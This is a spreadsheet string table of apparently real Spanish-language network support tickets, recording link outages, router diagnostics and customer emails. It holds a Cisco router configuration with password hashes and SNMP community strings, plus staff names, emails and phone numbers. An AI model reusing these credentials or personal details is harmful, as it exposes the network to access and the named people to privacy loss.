  <si>
    <t xml:space="preserve">NO SE ALCANZA NUEVAMENTE EL CPE SE SOLICITA AL CLIENTE VIA CORREO UN CONTACTO Y QUE PUEDA VALIDAR PROBLEMAS DE ENERGIA COMERCIAL
NO SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE CAÍDO.
PING HACIA ROUTER CPE:
PING -M 10 -Q -VPN DATOSBELLUNO 10.31.57.171
  PING 10.31.57.171: 56  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.31.57.171 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    0 PACKET(S) RECEIVED
    100.00% PACKET LOSS
RUTA IP:
PE: 10.179.28.59
DISPLAY IP ROUTING-TABLE VPN-INSTANCE DATOSBELLUNO 10.31.57.171
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : DATOSBELLUNO
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
   10.31.57.168/29  DIRECT  0    0             D   10.31.57.169    VLANIF2146			</t>
  </si>
  <si>
    <t>SE PROCEDE A ENVIA CORREO AL CLLIENTE CON EVIDENCIA QUE SE ENCONTRO EN EL CPE DE  UNA CAIDA POR ENERGIA EN EL PUENTO REMOTO YA QUE EL SERVICIO SE ENCUENTRA UP SE PORCEDE A DEJAR EN ETAP PENDIENTE CLIENTE.</t>
  </si>
  <si>
    <t xml:space="preserve">SE VALIDA QUE SE TUVO UNA FALLA DE ENERGIA EN EL PUNTO REMOTO O UN REINICIO PROVOCADO YA QUE SE TINE UNO HACE 41 MINUTOS.SE VALIDARA CON EL CLIENTE .
SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO.
SE OBSERVA UNA ALARMA DE ENERGIA RECIENTE (HACE: 41 MINUTOS)
CISCO IOS XE SOFTWARE, VERSION 16.09.02
CISCO IOS SOFTWARE [FUJI], ISR SOFTWARE (X86_64_LINUX_IOSD-UNIVERSALK9_IAS-M), VERSI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BELLUNO_GT_CALZADA_CAYALA UPTIME IS 41 MINUTES
UPTIME FOR THIS CONTROL PROCESSOR IS 44 MINUTES
SYSTEM RETURNED TO ROM BY POWERON
SYSTEM IMAGE FILE IS "BOOTFLASH:ISR4200-UNIVERSALK9_IAS.16.09.02.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35000 KBPS
SMART LICENSING STATUS: SMART LICENSING IS DISABLED
CISCO ISR4221/K9 (1RU) PROCESSOR WITH 1784702K/6147K BYTES OF MEMORY.
PROCESSOR BOARD ID FJC2309A181
1 VIRTUAL ETHERNET INTERFACE
6 GIGABIT ETHERNET INTERFACES
32768K BYTES OF NON-VOLATILE CONFIGURATION MEMORY.
4194304K BYTES OF PHYSICAL MEMORY.
6598655K BYTES OF FLASH MEMORY AT BOOTFLASH:.
0K BYTES OF WEBUI ODM FILES AT WEBUI:.
CONFIGURATION REGISTER IS 0X2102
CC_BELLUNO_GT_CALZADA_CAYALA#
CONFIGURACION DEL CPE:
SHOW RUNN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 5693 BYTES
!
! LAST CONFIGURATION CHANGE AT 05:07:27 UTC TUE JUN 28 2022
!
VERSION 16.9
SERVICE TIMESTAMPS DEBUG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE TIMESTAMPS LOG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE PASSWORD-ENCRYPTION
PLATFORM QFP UTILIZATION MONITOR LOAD 80
NO PLATFORM PUNT-KEEPALIVE DISABLE-KERNEL-CORE
!
HOSTNAME CC_BELLUNO_GT_CALZADA_CAYALA
!
BOOT-START-MARKER
BOOT-END-MARKER
!
!
SECURITY AUTHENTICATION FAILURE RATE 3 LOG
ENABLE SECRET 5 $1$2KIX$ZE22DJVOHTELDXWFE0W/3/
!
NO AAA NEW-MODEL
!
!
IP DHCP POOL WEBUIDHCP
!
!
!
LOGIN BLOCK-FOR 120 ATTEMPTS 3 WITHIN 60
LOGIN QUIET-MODE ACCESS-CLASS ACCESO
!
!
!
!
!
!
!
SUBSCRIBER TEMPLATING
MULTILINK BUNDLE-NAME AUTHENTICATED
!
!
!
CRYPTO PKI TRUSTPOINT TP-SELF-SIGNED-2394815554
 ENROLLMENT SELFSIGNED
 SUBJECT-NAME CN=IOS-SELF-SIGNED-CERTIFICATE-2394815554
 REVOCATION-CHECK NONE
 RSAKEYPAIR TP-SELF-SIGNED-2394815554
!
!
CRYPTO PKI CERTIFICATE CHAIN TP-SELF-SIGNED-2394815554
 CERTIFICATE SELF-SIGNED 01
  30820330 30820218 A0030201 02020101 300D0609 2A864886 F70D0101 05050030
  31312F30 2D060355 04031326 494F532D 53656C66 2D536967 6E65642D 43657274
  69666963 6174652D 32333934 38313535 3534301E 170D3139 30383232 32313136
  32395A17 0D333030 31303130 30303030 305A3031 312F302D 06035504 03132649
  4F532D53 656C662D 5369676E 65642D43 65727469 66696361 74652D32 33393438
  31353535 34308201 22300D06 092A8648 86F70D01 01010500 0382010F 00308201
  0A028201 0100C2FD 04C30CAA BEAACA6B 6A84FEF0 43EE518B 598425DC 812BFB5D
  76B7252D 04098F9E E2677E3A 0DDF7EA2 CB10C32D CC4DFC30 5EB0EE3E D077F1D2
  18368A93 CA1ACA58 1E179199 23B9A39B F83EE505 E914A980 79D7498C D603E9FC
  36305946 958ECE6C 4818B0CF CE3E9638 8CB41D0A 6176BE2B 0828978D CE891D83
  9CBCAF03 7832E480 DE7BA2E7 1C2DF7D9 F0092E3C 7496666C 1878DA9D 50993185
  557AE3FF 4F730677 B0C84E4A 0A51FE3D EF051404 A3BBD359 5436FF33 552DBF7D
  1E6BD542 86AAD56D 7F3790ED 0D5325DC 68C7CAF9 0B5EFD85 2C932031 C1CAACE9
  E2EFEBFB 922CBD25 6D2E4204 882AA389 611D14CA C15ABD63 69AFE1D3 6C4197ED
  19ADE0B9 322B0203 010001A3 53305130 0F060355 1D130101 FF040530 030101FF
  301F0603 551D2304 18301680 14D433FB FF4D7252 B5CB9967 BA75D5AC 7315F711
  74301D06 03551D0E 04160414 D433FBFF 4D7252B5 CB9967BA 75D5AC73 15F71174
  300D0609 2A864886 F70D0101 05050003 82010100 07192623 56085743 DFB45691
  7E29376C DC70FDF3 C8EC88CF 6A9DE672 FCEEC97F 269686B8 E229C5BD 51244233
  03E0010F 208FCB5A 43B6E55C 3FDBBA77 80402940 4B3D425F 3BF15525 87FFCCE4
  85659CE0 DB71A286 3E5BA5D5 2BC8C354 A8FD36A7 53AE1360 805662F6 BBB23E42
  997716A9 A9123D5F DF952F7C 1238E8C2 4D25556C 53302B18 8C9A0B0A ED8E7847
  DA57331C 05B48E6F 637AAB03 F57736EB 49DF38F0 F23441AC E1ED1CFC 2E189F5F
  7AD15F45 4229C31C E9EA99E9 2CA89767 291A1B2F 4E992578 62E3672C 30B2B92E
  6912081B 21BB89FF 85A65F9A DE8FADC6 4A8D3884 109E6228 02808E0D 0B08F3B4
  771CD96B 467E4EB2 F2C67412 BFD8D579 33B7F781
  	QUIT
!
LICENSE UDI PID ISR4221/K9 SN FJC2309A181
NO LICENSE SMART ENABLE
DIAGNOSTIC BOOTUP LEVEL MINIMAL
!
SPANNING-TREE EXTEND SYSTEM-ID
!
!
!
USERNAME GESTIONIP PRIVILEGE 15 SECRET 5 $1$ARUG$EVY0NW.YMECQRMM9CJVZM1
!
REDUNDANCY
 MODE NONE
!
!
VLAN INTERNAL ALLOCATION POLICY ASCENDING
!
!
POLICY-MAP RATE
 CLASS CLASS-DEFAULT
  POLICE CIR 8192000 BC 1536000 BE 3072000
   CONFORM-ACTION TRANSMIT
   EXCEED-ACTION DROP
!
!
!
!
!
!
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.212.140.14 255.255.255.255
!
INTERFACE GIGABITETHERNET0/0/0
 DESCRIPTION WAN PRINCIPAL/_/340500068T/_/
 BANDWIDTH 8192
 IP ADDRESS 10.31.57.171 255.255.255.248
 LOAD-INTERVAL 30
 NEGOTIATION AUTO
!
INTERFACE GIGABITETHERNET0/0/1
 DESCRIPTION INTERFACE ACTUALMENTE NO ESTA EN USO
 NO IP ADDRESS
 NEGOTIATION AUTO
!
INTERFACE GIGABITETHERNET0/1/0
 DESCRIPTION LAN DEL CLIENTE
!
INTERFACE GIGABITETHERNET0/1/1
 DESCRIPTION INTERFACE ACTUALMENTE NO ESTA EN USO
!
INTERFACE GIGABITETHERNET0/1/2
 DESCRIPTION LAN DEL CLIENTE
!
INTERFACE GIGABITETHERNET0/1/3
 DESCRIPTION LAN DEL CLIENTE
!
INTERFACE VLAN1
 DESCRIPTION LAN DEL CLIENTE
 IP ADDRESS 10.1.39.1 255.255.255.0
 SERVICE-POLICY INPUT RATE
 SERVICE-POLICY OUTPUT RATE
!
IP FORWARD-PROTOCOL ND
NO IP HTTP SERVER
IP HTTP AUTHENTICATION LOCAL
IP HTTP SECURE-SERVER
IP ROUTE 0.0.0.0 0.0.0.0 10.31.57.169
!
!
!
IP ACCESS-LIST EXTENDED ACCESO
 PERMIT IP 10.0.0.0 0.255.255.255 ANY
LOGGING SOURCE-INTERFACE LOOPBACK5
ACCESS-LIST 88 REMARK MONITOREO DE CLARO
ACCESS-LIST 88 PERMIT 10.255.24.144 0.0.0.7
ACCESS-LIST 88 PERMIT 190.148.15.192 0.0.0.15
!
!
SNMP-SERVER COMMUNITY MON003405D RO
SNMP-SERVER COMMUNITY PUBLIC RO
SNMP-SERVER COMMUNITY MYAPPSOFTWARE RO
SNMP-SERVER COMMUNITY NM15SNMPRO RO 88
SNMP-SERVER TRAP-SOURCE LOOPBACK5
SNMP-SERVER LOCATION ORIENTE DE LA CALZADA CAYALA, DIAGONAL 35 (BOULEVARD AUSTRIACO) 16-25 ZONA 16 PAD D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ACCESS-CLASS ACCESO IN
 LOGIN LOCAL
 TRANSPORT INPUT ALL
!
!
!
!
!
!
END
CC_BELLUNO_GT_CALZADA_CAYALA#
LOG DEL ROUTER CPE:
SHOW LOG
SYSLOG LOGGING: ENABLED (0 MESSAGES DROPPED, 2 MESSAGES RATE-LIMITED, 0 FLUSHES, 0 OVERRUNS, XML DISABLED, FILTERING DISABLED)
NO ACTIVE MESSAGE DISCRIMINATOR.
NO INACTIVE MESSAGE DISCRIMINATOR.
    CONSOLE LOGGING: LEVEL DEBUGGING, 94 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    MONITOR LOGGING: LEVEL DEBUGGING, 0 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    BUFFER LOGGING:  LEVEL DEBUGGING, 94 MESSAGES LOGGED, XML DISABLED,
                    FILTERING DISABLED
    EXCEPTION LOGGING: SIZE (4096 BYTES)
    COUNT AND TIMESTAMP LOGGING MESSAGES: DISABLED
    PERSISTENT LOGGING: DISABLED
NO ACTIVE FILTER MODULES.
    TRAP LOGGING: LEVEL INFORMATIONAL, 98 MESSAGE LINES LOGGED
        LOGGING SOURCE-INTERFACE:       VRF NAME:
        LOOPBACK5
LOG BUFFER (4096 BYTES):
T0/0/0, CHANGED STATE TO DOWN
*JUN 28 05:20:47.759 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO DOWN
*JUN 28 05:21:29.760 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO UP
*JUN 28 05:21:29.770 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0/1, CHANGED STATE TO UP
*JUN 28 05:21:30.761 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO UP
*JUN 28 05:21:30.770 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0/1, CHANGED STATE TO UP
*JUN 28 05:21:37.768 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO DOWN
*JUN 28 05:21:37.770 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0/1, CHANGED STATE TO DOWN
*JUN 28 05:21:38.771 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0/1, CHANGED STATE TO DOWN
*JUN 28 05:21:40.767 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO UP
*JUN 28 05:21:43.769 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0/1, CHANGED STATE TO UP
*JUN 28 05:21:44.769 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0/1, CHANGED STATE TO UP
*JUN 28 05:22:45.771 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO DOWN
*JUN 28 05:22:46.769 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0/1, CHANGED STATE TO DOWN
*JUN 28 05:22:46.773 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO DOWN
*JUN 28 05:22:47.770 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0/1, CHANGED STATE TO DOWN
*JUN 28 05:22:50.778 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO UP
*JUN 28 05:22:51.778 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO UP
*JUN 28 05:24:40.782 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO DOWN
*JUN 28 05:24:41.782 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO DOWN
*JUN 28 05:25:12.783 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO UP
*JUN 28 05:25:12.786 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0/1, CHANGED STATE TO UP
*JUN 28 05:25:13.784 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO UP
*JUN 28 05:25:13.786 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0/1, CHANGED STATE TO UP
*JUN 28 05:25:20.779 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO DOWN
*JUN 28 05:25:20.781 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0/1, CHANGED STATE TO DOWN
*JUN 28 05:25:21.779 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO DOWN
*JUN 28 05:25:21.781 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0/1, CHANGED STATE TO DOWN
*JUN 28 05:25:23.783 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO UP
*JUN 28 05:25:24.783 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO UP
*JUN 28 05:25:26.779 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0/1, CHANGED STATE TO UP
*JUN 28 05:25:27.780 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0/1, CHANGED STATE TO UP
*JUN 28 05:26:29.778 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO DOWN
*JUN 28 05:26:29.780 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0/1, CHANGED STATE TO DOWN
*JUN 28 05:26:30.779 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO DOWN
*JUN 28 05:26:30.779 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0/1, CHANGED STATE TO DOWN
*JUN 28 05:26:34.781 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO UP
*JUN 28 05:26:35.781 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO UP
*JUN 28 05:48:32.836 UTC: %SEC_LOGIN-5-LOGIN_SUCCESS: LOGIN SUCCESS [USER: GESTIONIP] [SOURCE: 10.31.57.169] [LOCALPORT: 23] AT 05:48:32 UTC TUE JUN 28 2022
CC_BELLUNO_GT_CALZADA_CAYALA#
SHOW CLOCK
*05:48:54.363 UTC TUE JUN 28 2022
CC_BELLUNO_GT_CALZADA_CAYALA#
TABLA ARP DEL ROUTER CPE:
SHOW ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.1.39.1               -   D4E8.80D4.4284  ARPA   VLAN1
INTERNET  10.1.39.10              0   4C11.BF6B.1B54  ARPA   VLAN1
INTERNET  10.1.39.50             18   0090.C2F4.454F  ARPA   VLAN1
INTERNET  10.1.39.51             22   0001.2E6F.E6AA  ARPA   VLAN1
INTERNET  10.1.39.75              7   38BB.3CBF.F7B5  ARPA   VLAN1
INTERNET  10.1.39.101             0   0060.EF1D.9B94  ARPA   VLAN1
INTERNET  10.1.39.102            13   0060.EF1D.9A3A  ARPA   VLAN1
INTERNET  10.1.39.103             9   0060.EF1D.9BD1  ARPA   VLAN1
INTERNET  10.1.39.104             3   0060.EF1D.2C7C  ARPA   VLAN1
INTERNET  10.1.39.105            10   0060.EF1D.9A4E  ARPA   VLAN1
INTERNET  10.1.39.151             0   C400.AD2C.D5EF  ARPA   VLAN1
INTERNET  10.1.39.152             0   C400.AD2C.D521  ARPA   VLAN1
INTERNET  10.31.57.169            3   3C78.43EF.DAD9  ARPA   GIGABITETHERNET0/0/0
INTERNET  10.31.57.171            -   D4E8.80D4.4200  ARPA   GIGABITETHERNET0/0/0
CC_BELLUNO_GT_CALZADA_CAYALA#
INTERFACES DEL ROUTER:
SHOW INTERFACES DESCRIPTION
INTERFACE                      STATUS         PROTOCOL DESCRIPTION
GI0/0/0                        UP             UP       WAN PRINCIPAL/_/340500068T/_/
GI0/0/1                        DOWN           DOWN     INTERFACE ACTUALMENTE NO ESTA EN USO
GI0/1/0                        DOWN           DOWN     LAN DEL CLIENTE
GI0/1/1                        DOWN           DOWN     INTERFACE ACTUALMENTE NO ESTA EN USO
GI0/1/2                        DOWN           DOWN     LAN DEL CLIENTE
GI0/1/3                        UP             UP       LAN DEL CLIENTE
LO5                            UP             UP       MONITOREO DEL CNOC
VL1                            UP             UP       LAN DEL CLIENTE
CC_BELLUNO_GT_CALZADA_CAYALA#
SHOW IP INT BRIEF
INTERFACE              IP-ADDRESS      OK? METHOD STATUS                PROTOCOL
GIGABITETHERNET0/0/0   10.31.57.171    YES NVRAM  UP                    UP
GIGABITETHERNET0/0/1   UNASSIGNED      YES NVRAM  DOWN                  DOWN
GIGABITETHERNET0/1/0   UNASSIGNED      YES UNSET  DOWN                  DOWN
GIGABITETHERNET0/1/1   UNASSIGNED      YES UNSET  DOWN                  DOWN
GIGABITETHERNET0/1/2   UNASSIGNED      YES UNSET  DOWN                  DOWN
GIGABITETHERNET0/1/3   UNASSIGNED      YES UNSET  UP                    UP
LOOPBACK5              10.212.140.14   YES NVRAM  UP                    UP
VLAN1                  10.1.39.1       YES NVRAM  UP                    UP
CC_BELLUNO_GT_CALZADA_CAYALA#
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN DATOSBELLUNO 10.31.57.171
  PING 10.31.57.171: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.31.57.171 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/2 MS
RUTA IP:
PE: 10.179.28.59
DISPLAY IP ROUTING-TABLE VPN-INSTANCE DATOSBELLUNO 10.31.57.171
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : DATOSBELLUNO
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
   10.31.57.171/32  DIRECT  0    0                 0.0.0.0         VLANIF2146			</t>
  </si>
  <si>
    <t>F4619582</t>
  </si>
  <si>
    <t>***--- SE RESPONDE CORREO A CL INDICANDO EL DIAGNOSTICO --*-**
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: MARTES, 28 DE JUNIO DE 2022 05:11
PARA: SAUL ORELLANA (VENDOR) &lt;SAUL.ORELLANA0@WALMART.COM&gt;
CC: CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA &lt;CAM-CCINFR@WAL-MART.COM&gt;; CORPOWALMART &lt;CORPOWALMART@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: ENLACE CAÍDO DE PALI ATENAS ID: CONTR0001515036OC
BUENOS DÍAS ESTIMADO SR. ORELLANA.
                PERSONAL A CARGO NOS INDICA QUE NO SE REALIZÓ NINGUNA CORRECCIÓN EN EL ENLACE, AL MOMENTO DE LA REVISIÓN INICIAL SE ENCONTRABA ACTIVO.
PODRÍA INDICARNOS SI PODRÍAMOS CERRAR NUESTRO TICKET.
CUALQUIER CONSULTA QUEDAMOS A LA ORDEN.
SALUDOS.
DE: SAUL ORELLANA (VENDOR) [MAILTO:SAUL.ORELLANA0@WALMART.COM]
ENVIADO EL: MARTES, 28 DE JUNIO DE 2022 05:06
PARA: CORPOWALMART &lt;CORPOWALMART@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA &lt;CAM-CCINFR@WAL-MART.COM&gt;
ASUNTO: RE: ENLACE CAÍDO DE PALI ATENAS ID: CONTR0001515036OC
BUENOS DÍAS, NOS PODRÍAN INDICAR SI SE ENCONTRÓ ALGÚN PROBLEMA CON EL ENLACE, ACTUALMENTE YA SE VE RESTABLECIDO.
GRACIAS Y SALUDOS.</t>
  </si>
  <si>
    <t>***--- CL AUTORIZA CIERRE DE SD ---***
DE: SAUL ORELLANA (VENDOR) [MAILTO:SAUL.ORELLANA0@WALMART.COM]
ENVIADO EL: MARTES, 28 DE JUNIO DE 2022 05:20
PARA: EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;
CC: CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA &lt;CAM-CCINFR@WAL-MART.COM&gt;; CORPOWALMART &lt;CORPOWALMART@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: ENLACE CAÍDO DE PALI ATENAS ID: CONTR0001515036OC
BUENOS DÍAS, PODEMOS CERRAR EL TICKET.
GRACIAS Y SALUDOS.</t>
  </si>
  <si>
    <t>F4619584</t>
  </si>
  <si>
    <t>***--- CL AUTORIZA CIERRE DE SD --***
DE: SAUL ORELLANA (VENDOR) [MAILTO:SAUL.ORELLANA0@WALMART.COM]
ENVIADO EL: MARTES, 28 DE JUNIO DE 2022 05:20
PARA: CORPOWALMART &lt;CORPOWALMART@CLARO.COM.GT&gt;; EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
CC: CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA &lt;CAM-CCINFR@WAL-MART.COM&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: ENLACE CAÍDO DE MAXI PALI ATENAS ID: CONTR0001427828OC
BUENOS DÍAS, PODEMOS CERRAR EL TICKET.
GRACIAS Y SALUDOS.</t>
  </si>
  <si>
    <t>F4619630</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ENIO JIMENEZ 55554795 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001680289</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ENIO JIMENEZ AL 55554795 NO RESPONDE || SE INTENTARA LUEGO**
-ID 2001663815
**</t>
  </si>
  <si>
    <t>F4619675</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 52 55 5174 5299 MENCIONA QUE AUN PERSISTE EL INCONVENIENTE, SE LE SOLICITA PUEDAN COMPARTIR LAS PRUEBAS POR CORREO
-ID 2001681007</t>
  </si>
  <si>
    <t>***--- SE RESPONDE CORREO A CL CON DIAGNOSTICO YA QUE CONSULTA QUE SE OBSERVO DE NUESTRO LADO TOMANDO EN CUENTA LOS EVENTOS QUE L COMPARTIO CON SUS PRUEBAS --**
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: MIÉRCOLES, 29 DE JUNIO DE 2022 02:33
PARA: CARRILLO MONTERO JOSE ANGEL &lt;CMONTERJ@UNINET.COM.MX&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; BRUGADA HERNANDEZ DANIEL &lt;DBRUGADA@UNINET.COM.MX&gt;; SANCHEZ MANRRIQUEZ MARIA GUADALUPE &lt;MSMANRRI@UNINET.COM.MX&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL PA-MNCSCT0001IN-TDA ::: TICKET CNOC IMSCI003208::: "PERDIDA DE PAQUETES"
BUENOS DÍAS ESTIMADO SR. CARRILLO.
                RESPECTO A SU SOLICITUD EL PERSONAL A CARGO NOS INDICA QUE DE NUESTRO LADO NO SE OBSERVARON EVENTOS EN NUESTRA RED Y TAMPOCO SE RESLIZARON CORRECCIONES.
PODRIAN INDICARNOS SI PODRIAMOS CERRAR NUESTRO TICKET.
CUALQUIER CONSULTA QUEDAMOS A LA ORDEN.
SALUDOS.
DE: CARRILLO MONTERO JOSE ANGEL [MAILTO:CMONTERJ@UNINET.COM.MX]
ENVIADO EL: MIÉRCOLES, 29 DE JUNIO DE 2022 02:22
PARA: LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; SANCHEZ MANRRIQUEZ MARIA GUADALUPE &lt;MSMANRRI@UNINET.COM.MX&gt;; EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; BRUGADA HERNANDEZ DANIEL &lt;DBRUGADA@UNINET.COM.MX&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL PA-MNCSCT0001IN-TDA ::: TICKET CNOC IMSCI003208::: "PERDIDA DE PAQUETES"
BUEN DIA
EFECTIVAMENTE EL SERVICIO ESTA ACTIVO, PERO QUEREMOS CONOCER LA CAUSA QUE ORIGINO LA PERDIDA DE PAQUETES Y LATENCIA DEL SERVICIO, DE ACUERDO A LA EVIDENCIA COMPARTIDA CUANDO SE SOLICITO ABRIR EL TICKET, QUEDAMOS AL PENDIENTE.
SALUDOS/BEST REGARDS</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 52 55 5174 5299 RESPONDE GERARDO MENCIONA QUE AUN NO TIENEN RESPUESTA POR PARTE DE CLIENTE
-ID 2001809551</t>
  </si>
  <si>
    <t>SE ACTUALIZO A CLIENTE VÍA CORREO.
ASUNTO: SOLICITUD DE SOPORTE ::: ID LOCAL PA-MNCSCT0001IN-TDA ::: TICKET CNOC IMSCI003208::: "PERDIDA DE PAQUETES"
JURGEN RENE BOCH CAAL
BUEN DÍA,
ESTIMADO CLIENTE, POR ESTE MEDIO LE INFORMAMOS QUE EL DÍA DE HOY HUBO UN CORTE DE FIBRA ÓPTICA EN COSTA RICA EN LOS SITIOS BAGACES, ENTRADA CAÑAS A LAS 6:42 AM DE HOY, LOS SERVICIOS SE CONMUTAN POR ESA AFECTACIÓN.  LAS REPARACIONES POR PARTE DE PERSONAL COMENZARON A LAS 10 AM, ESTÁN FINALIZANDO CON LAS REPARACIONES.
SALUDOS.
.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 52 55 5174 5299 RESPONDEN PERO NO ESCUCHAN  || SE INTENTARA LUEGO **
-ID 2001662245
**</t>
  </si>
  <si>
